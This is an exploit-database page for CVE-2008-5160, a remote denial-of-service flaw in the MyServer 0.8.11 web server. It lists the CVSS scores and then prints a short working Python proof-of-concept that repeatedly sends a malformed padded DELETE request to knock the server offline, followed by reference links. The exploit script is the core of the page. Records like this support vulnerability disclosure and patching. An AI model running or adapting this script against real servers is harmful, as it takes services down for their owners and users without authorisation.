MyServer 0.8.11 (204 No Content) error Remote Denial of Service Exploit

2008.11.20
Credit: shinnai
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2008-5160
CWE: NVD-CWE-noinfo


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

#exploit.py import socket import os print '------------------------------------------------------------------' print ' MyServer 0.8.11 "204 No Content" error Remote Denial of Service' print ' url: www.myserverproject.net' print ' author: shinnai' print ' mail: shinnai[at]autistici[dot]org' print ' site: http://shinnai.altervista.org' print ' I do not have time for explanations, just to say that yuo can' print ' use even other HTTP methods as GET, OPTIONS etc :-)' print '------------------------------------------------------------------' buff = "A" * 50 host = "127.0.0.1" port = 80 for i in range (0,20): try: connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((host, port)) connection.send("DELETE" + buff + " HTTP/1.0\r\n") except: print "Unable to connect"

References:

http://www.securityfocus.com/bid/27981
http://www.milw0rm.com/exploits/5184


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top